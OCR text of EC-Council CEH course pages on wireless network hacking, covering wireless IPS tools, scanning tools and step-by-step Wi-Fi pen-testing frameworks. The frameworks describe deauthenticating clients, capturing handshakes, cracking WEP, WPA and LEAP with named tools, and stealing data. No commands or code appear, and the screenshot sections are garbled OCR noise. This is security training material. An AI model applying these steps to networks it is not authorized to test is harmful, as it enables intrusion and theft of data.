D e te ctio n

Unauthorized Association Fragmentation Attack

Probing and Network Discov

Location Tracking

Honeypot

ASLEAP Attack

W EP Crack

MITM Attack

MAC Spoofing

Fake DHCP Server

FIGURE 15.77: Wireless Intrusion Prevention Systems

Module 15 Page 2362

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

W ire le s s IP S D e p lo y m e n t

(«rt1fw4

CEH
tlfcxjl HMbM

DMZ

Wi-Fi Intrusion Prevention System

Copyright © by IG-C0HCil. All Rights Reserved. Reproduction is Strictly Prohibited.

W i r e l e s s IP S D e p l o y m e n t
A WIPS is made up of a number of components that work together to provide a unified security monitoring solution. Component functions in a Cisco's Wireless IPS Deployment: 9 Access Points in Monitor Mode: Provides constant channel scanning with attack detection and packet capture capabilities. Mobility Services Engine (running wireless IPS Service): The central point of alarm aggregation from all controllers and their respective wireless IPS Monitor Mode Access Points. Alarm information and forensic files are stored on the system for archival purposes. Local Mode Access Point(s): Provides wireless service to clients in addition to timesliced rogue and location scanning. Wireless LAN Controller(s): Forwards attack information from wireless IPS Monitor Mode Access Points to the MSE and distributes configuration parameters to APs. Wireless Control System: Provides the administrator the means to configure the wireless IPS Service on the MSE, push wireless IPS configurations to the controller, and set APs into wireless IPS Monitor mode. It is also used for viewing wireless IPS alarms, forensics, reporting, and accessing the threat encyclopedia.

9

9

9

9

Module 15 Page 2363

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

DMZ

O
Authentication _ . Database Server

W iF i

Intrusion
Prevention

System

Corporate Wi-Fi Network
FIGURE 15.78: Cisco's Wireless IPS Deployment

Module 15 Page 2364

Ethical Hacking and Countermeasures Copyright © by EC-C0l1ncil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wi-Fi Security Auditing Tool: AirMagnet WiFi Analyzer
J J It is a Wi-Fi networks auditing and troubleshooting tool Automatically detects security threats and other wireless network vulnerabilities It detects Wi-Fi attacks such as Denial of Service attacks, authentication/ encryptions attacks, network penetration attacks, etc. It can locate unauthorized (rogue) devices or any policy violator

CEH

J

‫ ל‬A f fa ir * * ■ ■ KS *•(*beHn-fc* [0 3 MDdt-twt-^7 ks U [3 1» ‫־‬ N I t **-tST-V-9 tip 6«‫< נ׳‬ r >tm Uotwi-cn-to *e-T£5TAI>* UniwrtvTVlP*

,’CrffcfSiUf‫נ‬ * = > ::P9:F9:6A* ‫מ י‬ oe: u!< 0*e1«4:70 60‫־‬ SE!JB9C FC«:fB:4Af23l »-00:».‫נכ‬:07£; ‫י‬8

“ ‫״‬ n

1 0 0 l0 0 l0e

0 WAJr • , M ~ ‫<*'•'׳‬: ‫׳‬. a m 0 O p e n 1 . .

n

‫־‬

902 ‫ ו ו‬WDtwhcf!

J

O ssio ‫זמן‬
5 A<J-M0C AP (87) J

1 0 0• H 1 0 0 1 n r 1 0 0 IO C 1 0 01 0 c 0 w*a‫«ג‬ 1 0 0 IO C0 1 0 0 1 0 ‫׳‬. 0 O p e ‫״‬ 4! • M 0 **AJ*

t. » « 1 N '* **•n U *C«t

3 1TAI12 H - *J A lV lSEA dv< • ffl ; ^ ‫מו‬/‫ ןמו‬4 3 ^

VA iW tS t ‫נ‬

AlrWlSE

*•euilylDSdPS

. p*#o*runc• Vk**0t 4

p . «‫ ל‬c• ‫*״‬ ‫<זיב*ו‬ >^ • cu iv ♦ ‫ ט‬Rjv^A P‫״‬v ,£ 'lV w n f . ‫ ם‬uwaj‫״‬ * ‫״‬ ‫״׳‬ ■ ‫'״״‬

1

B S S S S fS .

2 ‫;־‬

‫וי‬

< ;.com
,//W W W ./ ‫ ״׳‬k e n e r

‫— ״* — ■*כ‬

Copyright © by IG-C0HCil. All Rights Reserved. Reproduction is Strictly Prohibited.

W i-F i S e c u r it y A n a ly z e r

A u d i t in g

T o o l:

A irM a g n e t

W iF i

Source: http://www.flukenetworks.com AirMagnet WiFi Analyzer is a standard tool for mobile auditing and troubleshooting enterprise Wi-Fi networks. It helps IT staff solve end-user issues while automatically detecting security threats and wireless network vulnerabilities. The solution enables network managers to test and diagnose dozens of common wireless performance issues including throughput issues, connectivity issues, device conflicts, and signal multipath problems. It includes a full compliance reporting engine, which automatically maps collected network information to requirements for compliance with policy and industry regulations. AirMagnet WiFi Analyzer is available in "Express" and "PRO" versions. Express provides the core building blocks of Wi-Fi troubleshooting and auditing with the ability to see devices, automatically identify common problems, and physically locate specific devices. PRO version significantly extends all the capabilities found in the Express version and adds many more to provide a Wi-Fi tool to solve virtually any type of performance, security, or reporting challenge in the field. AirMagnet WiFi Analyzer can detect Wi-Fi attacks such as DoS attacks, authentication/encryptions attacks, network penetration attacks, etc. It can easily locate unauthorized (rogue) devices or any policy violator.

Module 15 Page 2365

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

*

Ail Magnet W iFi Analyze! PRO - deino 55.0%
H e* 2.4/5GHz * ₪ Dashboard 2 4GHr(002 ‫ ו ו‬b . W © 3 J g All Devices AP g STA © Ad-Hoc

E

1 0 - IL i- ©

Start

\s
|Q Security © SSID

I
10

Signal Level(dBm)

I© Device

■ 11 (D

1

R

3

Type: AP 11 © 1C:BD:B9:B6:56:5A 1C:BD:B9:B6:66:5A FC:FB:FB:6A:E2:3A 6a:BD;A8;D3:07;E2 FC:FB:FB:6A:E2:32 00:13:60:6E:64:70 68:0D:AB:D3:33:A1
E0:46:9A: 5E:26:90

n
n

-100 -100 0 •100 ‫־‬ 86
0

WPA2-P N WPA2-E N Open Open
N

dirk srnonte
Authori

1 > 1 gnal Levd(cBm]
■ 1
3C 40

* ‫ ׳‬149 © AME-TEST-AP-9 11 © lap-oeij-an-tek

n n a n n n
n

-100 ■ 1 0 0 0 •100 ■ 1 0 0 0 •100 -94 0 -100 -100 0 -100 -100 0 -100 -100 0 -100 -100 0 •100 -100 m < P
. 1 nn -inn
0 0

5GH48021 W m O

1

V ‫ ׳‬11 © AME-TEST-AP-9 V 161 © btock‫־‬test-ap-7 © lap-beij-cn-tek *‫׳‬
6

WPA2-E N N WPA2-E N WPA2-P N WPA2-E N WPA2-E Open
W V ll- T N

NG5nev don't bk NETGE^
AHC-E1

6

© E0:46:9A:SE:2B:9D

10 r >
-

11 © AME-TEST-AP-9 V 11 © lap-beij-cn-tek V 11 © lap-beij-cn-tek * ‫ ׳‬149 © AME-TEST-AP-9
ft l*r*->V^n -rrs

FC:FBfB:6A:E2:31
68:BO:AB:D3:07:E1

802.11 Inform ation O SSID (3 3 1 Q Ad-Hoc - K Infrastructure i«> AP (87)

5a:BC:27:93:EE:B2 FC:FBi=B:6A:E2:39 /•^•‫חח‬4‫ו ח ח‬. ‫ ו ר‬4‫ח‬

n n

N

Author!

WPA2-P N

AHC«

%

n

-

A 11W I S EA d v i c e

SS T A( 1 2 1 )

1 -

( 3 Security IDS/IPS (43.198.89,3) ^ Performance Violation (0,0,9,81) Broadcast Uncast Total Fra.. 6887 Multicast 11361 18637 ..... ‫״״‬ 1k & 389 0 0.00?S

AirWISE ^ Security IDS/IPS P‫־־‬l Ccnfioiiation Vulneiabkt + C3 IDS •Denial of Service A D IDS •Seemly Penetratio * Q Rogue AP arid Slaton ♦ Q User Authenticaticr! &Er ‫ ♦ ־‬Performance Violation Q Channel or Device Overl

A irW IS E 'J___ S' curty DS/tPS

r

Performance V lolation ‫ ־‬7

U---- ---------< _
I I Filter Alarms By Device

« a!! m

‫־‬

F IG U R E 15.79: A irM a g n e t W iF i Analyzer Screensho t

Module 15 Page 2366

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wi-Fi Security Auditing Tool: A irD efense

C EH
—- ‫־‬ ‫־‬ »

,‫^ן‬

W i-F i S e c u r it y A u d i ti n g T o o l: A i r D e f e n s e
Source: http://www.airdefense.net

AirDefense provides a single Ul-based platform for wireless monitoring, intrusion protection, automated threat mitigation, etc. It provides tools for wireless rogue detection, policy enforcement, intrusion prevention, and regulatory compliance. It uses distributed sensors that work in tandem with a hardened purpose-built server appliance to monitor all 802.11 (a/b/g/n) wireless traffic in real time. It analyzes existing and day-zero threats in real time against historical data to accurately detect all wireless attacks and anomalous behavior. It enables the rewinding and reviewing of detailed wireless activity records that assist in forensic investigations and ensure policy compliance.

Module 15 Page 2367

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

N&twori<

Alarm?

Conflguraton

Ik* P0IM Wirele** Client J CH Quick Stajrity Viow I K.O.0 Ch«nntl ftm ldJ — *<*«• W lf‫«־‬l«M Ar‫״ ״‬

W ire dS w < r f1 «s
WfflM S

Wired Switches W1 rele55 SwitC. ..

1,?on
1,624

S e n s o rs
w«re*es$ Cte^ts BSS*

FIGURE 15.79: AirDefense Screenshot

Module 15 Page 2368

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wi-Fi Security Auditing Tool: Adaptive W ireless IPS

f Fu

Copyright © by IG-COHCil. All Rights Reserved. Reproduction is Strictly Prohibited.

(«•»)

W i-F i S e c u r it y A u d i ti n g T o o l: A d a p ti v e W i r e l e s s IP S
Source: http://www.cisco.com

Adaptive Wireless IPS (WIPS) provides specific network threat detection and mitigation against malicious attacks, security vulnerabilities, and sources of performance disruption. It provides the ability to detect, analyze, and identify wireless threats. It also delivers proactive threat prevention capabilities for a hardened wireless network core that is impenetrable by most wireless attacks, allowing customers to maintain constant awareness of their RF environment.

Module 15 Page 2369

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

I

• I I I II I I I
CISCO

A la rm S iiiiiiiih v^
Roports ‫׳י־‬ © Configure ▼ Sen

Wireless Control System U<#r: r rn t tg! virtual D om ain‫׳‬ f i t ' » Logout

Monitor ‫״‬ 8y«t«m

Advanced Parameters: sanity-mse
*eri/OM ' Mctaltv •aar/c#♦ > ayst♦n > fetsm ai General Information Product Nome Version Started At Current Server Time Timezonc Hardware Restarts Active Sessions Cisco Mobility Scrvics Cnone 6 0*2 A 2/l61'09 1 49 PM 2/17,9:54 09‫ ׳‬AM Am sricc/Lc5_An gs! c s 10 1 session Timeout 30 1440 | 1 99999 rains J 1 99399 ‫ ־‬rnins Absent Data cleanup interval Logging Level Trocc fcd Bviblc 0 Erable Kotiftflt Hjrdsiare y Cor© Engine Database Gcnerol MSEAocation Servers Object Manager SMMP Mediation XML Mediation Asynchronous NMSP Protocol Product Idenbfier (PID) Version Idortfiod (VJD) Serial Number (SN) Advanced Parameters Advanced Debuo Humber of Dcj> to keep Events □ 2 J 1 • 99999 AIR-MSE-3010-K9 V01 Not Specified

L J Generd Properttes NM5P Prt dm-ters y j Atr up se«1nn< 1 rap L‫׳‬est raters | ‫ ן‬Advanced Parameters gJLcgs ► (fcjAtcam ► i n Status ► 1£j paanrenance Context Aware Service v»lPS Service NIP. Service ® O

a
|

₪ Enable Ed Encbls bd Era b19 LJ Enable Ed & ‫«־‬b k Q Enable Q ervabl# Cl* jr C9nit 0‫וי‬ration

FIGURE 15.80: Adaptive Wireless IPS Screenshot

Module 15 Page 2370

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wi-Fi Security Auditing Tool: Aruba RFProtect WIPS
Integrated wireless intrusion detection and prevention

f FH

YOU ARE NO W
■ Automatic threat mitigation for centrally evaluating forensic data, and actively containing rogues and locking down device configuration Automated compliance reporting to meet policy mandates for PCI, HIPAA, D0D 8100.2, and GLBA with automated report distribution that is tailored to specific audit requirements

IN A W IF I A R E A

I The M o b ile E d g e Company
http ://www. arubanetworks.com

1

Copyright © by EG-GtUCil. All Rights Reserved. Reproduction is Strictly Prohibited.

W i-F i S e c u r it y A u d i t i n g T o o l: A r u b a R F P r o t e c t W IP S
Source: http://www.arubanetworks.com Aruba's RFprotect system represents the breed overlay wireless intrusion detection and prevention (WIDP) system. RFprotect Distributed is a wireless security solution that incorporates the Wireless Threat Protection Framework, including user-defined threat signatures for complete threat detection, attack prevention, "no wireless" policy enforcement, and compliance reporting inside the enterprise. It is capable of doing automatic threat mitigation for centrally evaluating forensic data, actively containing rogues, and locking down device configuration and automated compliance reporting to meet policy mandates for PCI, HIPAA, D0 D 8100.2, and GBLA with automated report distribution that is tailored to specific audit requirements.

Module 15 Page 2371

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

_

Wi-Fi Intrusion Prevention System

CEH

£
H ‫ ־‬E

Enterasys® Intrusion Prevention System
http://www.enterasys. com

Network Box IDP
http://www.network-box.co.uk

RFProtect Wireless Intrusion Protection
http://www.arubanetworks.com

AirMobile Server
http://www.airm obile.5e

SonicWALL Wireless Networking
http://o-www.sonicwall, com

WLS Manager
http://www.airpatrolcorp. com

(§ 1 * 1

HP TippingPoint IPS
http://hl 7007. wwwl.hp.com

A

J

Wireless Policy Manager (W P M )
http://www.airpatrolcorp.com

*
0 ‫ן‬

AirTight W IPS
http://www.airtightnetworks.com

z.

ZENworks® Endpoint Security Management
http://www.no veil, com

,m im i

Copyright © by IG-C0HCil. All Rights Reserved. Reproduction is Strictly Prohibited.

W i-F i I n t r u s i o n P r e v e n t i o n S y s te m

Wi-Fi intrusion prevention systems block wireless threats by automatically scanning, detecting, and classifying all unauthorized wireless access and rogue traffic to the network, thereby preventing neighboring users or skilled hackers from gaining unauthorized access to the Wi-Fi networking resources. A few Wi-Fi intrusion prevention systems are as follows: 9 9 9 9 9 9 9 9 9 9 Enterasys® Intrusion Prevention System available at http://www.enterasvs.com RFProtect Wireless Intrusion Protection available at http://www.arubanetworks.com SonicWALL Wireless Networking available at http://o-www.sonicwall.com HP TippingPoint IPS available at http://hl7007.wwwl.hp.com AirTight WIPS available at http://www.airtightnetworks.com Network Box IDP available at http://www.network-box.co.uk AirMobile Server available at http://www.airmobile.se WLS Manager available at http://www.airpatrolcorp.com Wireless Policy Manager (W PM ) available at http://www.airpatrolcorp.com ZENworks® Endpoint Security Management available at http://www.novell.com

Module 15 Page 2372

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wi-Fi Predictive Planning Tools
AirMagnet Planner
http://www.flukenetworks.com

CEH

h&

Connect EZ Predictive RF CAD Design
http://www.connect802.com

Cisco Prime Infrastructure
http://www.cisco.com

n
<^K i

Ekahau Site Survey (ESS)
http://www.ekahau. com

AirTight Planner
http://www.airtightnetworks.com

ZonePlanner
http://www.ruckuswireless.com

LANPIanner
_

" ’

http://www.m otorola, com

[ j j

Wi-Fi Planning Tool
http://www.aerohive.com

i ‫־‬n

RingMaster
http://www.juniper.net

TamoGraph Site Survey
http://www.tamos, com

Copyright © by IG-C0HCil. All Rights Reserved. Reproduction is Strictly Prohibited.

;;

‫ ן‬W i-F i P r e d i c t i v e P l a n n i n g T o o ls

Wi-Fi predictive planning tool successfully plan, deploy, monitor, troubleshoot, and report on indoor and outdoor wireless networks from a centralized location. A few Wi-Fi predictive planning tools are as follows: 9 9 9 9 Q Q 9 AirMagnet Planner available at http://www.flukenetworks.com Cisco Prime Infrastructure available at http://www.cisco.com AirTight Planner available at http://www.airtightnetworks.com LANPIanner available at http://www.motorola.com RingMaster available at http://www.juniper.net Connect EZ Predictive RF CAD Design available at http://www.connect802.com Ekahau Site Survey (ESS) available at http://www.ekahau.com

Q ZonePlanner available at http://www.ruckuswireless.com 9 9 Wi-Fi Planning Tool available at http://www.aerohive.com TamoGraph Site Survey available at http://www.tamos.com

Module 15 Page 2373

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wi-Fi Vulnerability Scanning Tools
to r ‫•׳ ״‬ Zenmap
http://nmap.org

CEH

Cj

Nexpose Community Edition
http://www.rapid7.com

Nessus
http://www. tenable.com

____
^

WiFish Finder ^
http://www.airtightnetworks.com

d

M

OSWA
http://securitystartshere.org

Penetrator Vulnerability ^I Scanning Appliance
http://www.secpoint.com

TgH

WiFiZoo
http://community.corest.com

SILICA
http://www.im m unityinc.com

Network Security Toolkit
___ J ‫ ___ ן‬J http://networksecuritytoolkit.org

Ijr3 |

Wireless Network Vulnerability Assessment
http://www.secnap.com

Copyright © by IG-C0HCil. All Rights Reserved. Reproduction is Strictly Prohibited.

W i-F i V u l n e r a b i l i t y S c a n n i n g T o o ls
Wi-Fi vulnerability scanning tools are vulnerability scanners that determine the weaknesses in the wireless networks and secure them before attackers actually attack and compromise. The following are a few Wi-Fi vulnerability scanning tools: e 9 9 9 Q Q 9 Q Zenmap available at http://nmap.org Nessus available at http://www.tenable.com OSWA available at http://securitystartshere.org WiFiZoo available at http://community.corest.com Network Security Toolkit available at http://networksecuritvtoolkit.org Nexpose Community Edition available at http://www.rapid7.com WiFish Finder available at http://www.airtightnetworks.com Penetrator Vulnerability Scanning Appliance available at http://www.secpoint.com

Q SILICA available at http://www.immunityinc.com 9 Wireless Network Vulnerability Assessment available at http://www.secnap.com

Module 15 Page 2374

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Module Flow

CE H

Copyright © by IG-C0HCil. All Rights Reserved. Reproduction is Strictly Prohibited.

M o d u l e F lo w
As mentioned previously, wireless networks are more vulnerable to attacks compared to wired networks. Wireless networks provide comfort and allow users to access the network from anywhere within the region. This is making wireless networks more popular today. Wireless networks are insecure if configured improperly and not maintained. Hence, in order to secure wireless networks, you should conduct pen testing on the WLAN to determine the security loopholes and then fix them. This whole section is devoted to Wi-Fi penetration testing, which describes the steps carried out by the pen tester to conduct penetration testing on a target WI-FI network.

Wireless Concepts

1<f ®

Wireless Encryption

^

Wireless Threats

Wireless Hacking Methodology

Wireless Hacking Tools

^

Bluetooth Hacking

Module 15 Page 2375

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Module 15 Page 2376

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

W ire le s s P e n e tr a tio n T e s tin g
A penetration test is the process of actively evaluating information security measures in a wireless network. There are a number of ways that this can be undertaken. The information security measures are actively analyzed for design weaknesses, technical flaws, and vulnerabilities. The results are delivered comprehensively in a report to executive, management, and technical audiences. The wireless penetration testing can be done for the following purposes: 9 Security Control Auditing: To test and validate the efficiency of wireless security protections and controls Data Theft Detection: Find streams of sensitive data by sniffing the traffic Information System Management: Collect information on security protocols, network strength, and connected devices, typically using network discovery, service identification modules, port scanners, and the OS Risk Prevention and Response: Provide s comprehensive approach of preparation steps that can be taken to prevent upcoming exploitation Upgrading Infrastructure: Change or upgrade existing infrastructure of software, hardware, or network design Threat Assessment: Identify the wireless threats facing an organization's information assets

9 9

Q

Q

9

Module 15 Page 2377

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

W ireless Penetration Testing Framework
Wireless Pen Testing Framework m Discover wireless devices wt If wireless device is found, document all
the findings a If the wireless device found is using Wi-Fi network, then perform general Wi-Fi network attack and check if it uses WEP encryption If WLAN uses WEP encryption, then perform WEP encryption pen testing or else check if it uses WPA/WPA2 encryption If WLAN uses WPA/WPA2 encryption, then perform WPA/WPA2 encryption pen testing or else check if it uses LEAP encryption If WLAN uses LEAP encryption, then perform LEAP encryption pen testing or else check if WLAN is unencrypted If WLAN is unencrypted, then perform unencrypted WLAN pen testing or else perform general Wi-Fi network attack

r V
(•itilwd

tt*H4i ttMhM

EH

«

M

Copyright © by IG-GOHCil. All Rights Reserved. Reproduction is Strictly Prohibited.

I

W ire le s s P e n e tr a tio n T e s tin g F ra m e w o rk

Generally, penetration testing is conducted through a series of steps to find out the vulnerabilities in the wireless network. The following are those penetrations steps that you, as a penetration tester, must follow to conduct a penetration test on a target wireless network. Step 1: Discover wireless devices The first step in the wireless penetration testing framework is discovering wireless devices in the vicinity. Several Wi-Fi network discovery tools are available online that give more information about the wireless networks in the vicinity. Examples of tools that can be used for finding Wi-Fi networks are: inSSIDer, NetSurveyor, Netstumbler, Vistumbler, and Wavestumbler. Step 2: Check whether a wireless device is found If YES, document all the findings such as the wireless devices in the region. If NO, try again to discover the wireless devices. Step 3: See if there is a Wi-Fi network If YES, perform a general Wi-Fi network attack and check for the encryption mechanism used by the Wi-Fi network. If NO, again start discovering wireless devices in the vicinity.
Module 15 Page 2378 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Step 4: Check whether the Wi-Fi network uses W EP encryption If YES, perform W EP penetration testing to break the encryption. If NO, check for other encryption mechanisms. WEP encryption, Wired Equivalent Privacy (WEP), is a security protocol specified in the IEEE Wireless Fidelity (Wi-Fi) standard 802.11b that is designed to provide a wireless local area network (WLAN) with a level of security and privacy comparable to what is usually expected of a wired LAN. W EP is a component of the IEEE 802.11 WLAN standards. Its primary purpose is to provide for confidentiality of data on wireless networks at a level equivalent to that of wired LANs. Physical security can be applied in wired LANs to stop unauthorized access to a network. Step 5: Check whether the Wi-Fi network uses WPA/WPA2 encryption If YES, then perform WPA/WPA2 penetration testing. If NO, check for other possibilities of encryption mechanisms. WPA encryption is less exploitable when compared with WEP encryption. But WPA is also a little cracker friendly. WPA/WAP2 can be cracked by capturing the right type of packets. Cracking can be done offline. Offline cracking only involves being near the AP for few moments. Step 6: Check whether the Wi-Fi network uses LEAP Encryption? If YES, then perform LEAP penetration testing. If NO, check whether the wireless LAN network is encrypted or not. LEAP is a Lightweight Extensible Authentication Protocol. It is a proprietary WLAN authentication protocol developed by Cisco. Step 7: Determine if it is an unencrypted WLAN If YES, then perform unencrypted WLAN penetration testing. If NO, perform a general Wi-Fi network attack.

Module 15 Page 2379

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wi-Fi Pen Testing I
General penetration steps for all Wireless networks:
1. Create a rogue access point Deauthenticate the client using the tools such as Karma, Hotspotter, Airsnarf, etc., and then check for client deauthentication If client is deauthenticated, then associate with the client, sniff the traffic and check if passphrase/certificate is acquired, or else try to deauthenticate the client again If passphrase is acquired, then crack the passphrase using the tool wzcook to steal confidential information or else try to deauthenticate the client again

2.

Copyright © by IG-GOHCil. All Rights Reserved. Reproduction is Strictly Prohibited.

W i-F i P e n T e s t i n g F r a m e w o r k
To conduct a penetration test by simulating the actions of an attacker, follow these steps: Step 1: Perform a general Wi-Fi network attack Wi-Fi pen testing framework begins with the general Wi-Fi network attack. Step 2: Create a rogue access point In order to create a backdoor into a trusted network, an unauthorized or unsecured access point is installed inside a firewall. Any software or hardware access point can be used to perform this kind of attack. Unauthorized access points can allow anyone with an 802.11equipped device onto the corporate network, which puts a potential attacker close to the mission-critical resources. With the help of wireless sniffing tools, the following can be determined: access points for the authorized Medium Access Control (MAC) address, vendor name, or security configurations. The attacker can then create a list of MAC addresses of authorized access points on the LAN, and cross check this list with the list of MAC addresses found by sniffing. An access point should be considered a rogue if it looks suspicious. It can possibly be located by using a simple known technique that involves walking with a wireless access point-sniffing device in the direction where the signal strength of the access point's beacon increases.

Module 15 Page 2380

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Finally, determine which part of the network needs to be examined. Sometimes a rogue access point may be an active access point that is not connected to the corporate network, but these access points are not security issues. When an access point is found that interfaces with the corporate network, it must be shut off immediately. Using a centralized network-monitoring device attached to the wired network, workstations and individual users that use multiple systems can be tracked easily. It is important to walk through a company's facilities so that rogue access points are detected and eliminated. Centralized network-monitoring devices are spyware that are used to monitor networks. Step 3: Is the client deauthenticated? If YES, associate with client. If NO, deauthenticate the client using a Wi-Fi vulnerability scanning tools such as Karma, Hotspotter, Airsnarf, etc. Step 4: Associate the client After deauthentication, the attacker or the pen tester should associate with the client in order to perform an attack on the Wi-Fi network. Several techniques are available to associate with the client. Step 5: Sniff the traffic After being associated with the client, the attacker or the pen tester should sniff the network traffic in order to analyze the traffic and search for the weak clients. In this step, the attacker should capture the IVs generated by making use of tools such as airodump-ng or Cain & Abel with a bssid filter to collect unique IVs. With the help of wireless sniffing tools, the authorized Medium Access Control (MAC) The attacker can then create a list of MAC and cross check this list with the list of MAC following can be determined: access points for the address, vendor name, or security configurations. addresses of authorized access points on the LAN, addresses found by sniffing.

Step 6: Determine if there ia an acquired passphrase/certificate? After sniffing the traffic, check whether any passphrase/certificate of the Wi-Fi network is acquired. If YES, then try to crack the passphrase/certificate. If NO, search for the deauth client.

Module 15 Page 2381

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Step 7: Crack the passphrase The pphrase is an element that is used for ensuring the security of the wireless network's data transmission. However, these this passphrase can consist of some flaws that attackers use to their advantage to launch attacks on the WLANs. Passphrases can be cracked using tools such as wzcoock. Step 8: Steal confidential information After cracking the passphrases, the attackers or the pen testers have full access to the network, as a legitimate user. After attaining the access credentials of a legitimate client, the attacker can steal the confidential or sensitive information of the clients or network.

Module 15 Page 2382

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Pen Testing LEAP Encrypted WLAN
START
v
■ Deauthenticate the client using tools such as Karma, Hotspotter, Airsnarf, etc. ■ If client is deauthenticated, then break the LEAP encryption using tools such as asleap, THCLEAP Cracker, etc., to steal confidential information or else try to deauthenticate the client again

Break LEAP

Steal Confidential Information

Use tools such as asleap, THC-LEAP Cracker, etc.

J %^

Copyright © by IG -C O H C il. All Rights Reserved. Reproduction is Strictly Prohibited.

P e n T e s t i n g a L E A P - E n c r y p te d W L A N
Penetration testing of the LEAP-encrypted WLAN involves the following steps: Step 1: Locate the LEAP-encrypted WLAN Pen testing a LEAP-encrypted WLAN begins with locating the LEAP-encrypted WALN. Step 2: Check for the deauth client If the client is deauthenticated, then break the LEAP encryption. LEAP stands for Lightweight Extensible Authentication Protocol. It is a proprietary wireless LAN authentication method developed by Cisco. It allows clients to reauthenticate frequently and generates a new W EP key for every successful authentication. Step 3: Break LEAP Though LEAP is more secure than other encryption mechanisms, it can also be broken using tools such as asleap, THC-LEAP Cracker, etc. In order break into the WLAN that is protected with LEAP encryption, the attacker first needs to break LEAP. Step 4: Steal confidential information Successfully breaking LEAP gives full network access to the attacker. Therefore, the attacker can steal confidential information of the client or network.

Module 15 Page 2383

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

P e n T e s t i n g W P A /W P A 2 E n c r y p t e d W LAN

v

Oeauth Client?

*

Use tools such as
Karma, Hotspotter, Airsnarf, etc.

m

f VJ

Sniff the Traffic

Captured

‫>־‬

EAPOL

....... >

® o

Deauthenticate the client using tools such as Karma, Hotspotter, Airsnarf, etc. If client is deauthenticated, sniff the traffic and then check the status of capturing EAPOL handshake or else try to deauthenticate the client again If EAPOL handshake is captured, then perform PSK dictionary attack using tools such as coWPAtty, Aircrack-ng, etc. to steal confidential information or else try to deauthenticate the client again Copyright © by IG-C0HCil. All Rights Reserved. Reproduction is Strictly Prohibited.

6

